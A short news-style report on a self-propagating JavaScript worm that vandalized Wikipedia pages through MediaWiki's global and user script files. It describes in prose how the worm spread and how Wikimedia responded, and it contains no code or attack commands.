Wikipedia Hit by Self-Propagating JavaScript Worm that Vandalized Pages

The worm leveraged MediaWiki’s flexible JavaScript architecture, where global and user‑specific scripts run in every editor’s browser. By inserting a loader into MediaWiki:Common.js, the malicious code achieved site‑wide execution, while also overwriting individual users’ common.js files to ensure persistence. This dual‑level approach allowed the script to self‑replicate rapidly, exploiting the same privilege escalation path that powers legitimate customizations. Such an attack demonstrates how open‑source platforms can be weaponized when script validation and execution contexts are insufficiently sandboxed.

Wikimedia’s response was swift: editing was temporarily frozen across all projects, automated revert tools were deployed, and the compromised scripts were purged from both global and user namespaces. Within 23 minutes, the malicious code was removed and the vandalized Meta‑Wiki pages were restored, limiting any lasting damage. The incident also revealed gaps in the testing workflow, as the dormant script was inadvertently activated by a staff account during a routine review. By publicly sharing the incident log and a concise statement, the Foundation aimed to maintain transparency and reassure the community.

Going forward, the Wikimedia Foundation is expected to tighten its code‑review policies, introduce stricter permission checks for script edits, and possibly sandbox user‑generated JavaScript to prevent similar exploits. The episode serves as a cautionary tale for other collaborative platforms that rely on user‑contributed client‑side code, emphasizing the balance between extensibility and security. Strengthening governance around script deployment will be essential to safeguard the integrity of open knowledge ecosystems and retain user confidence.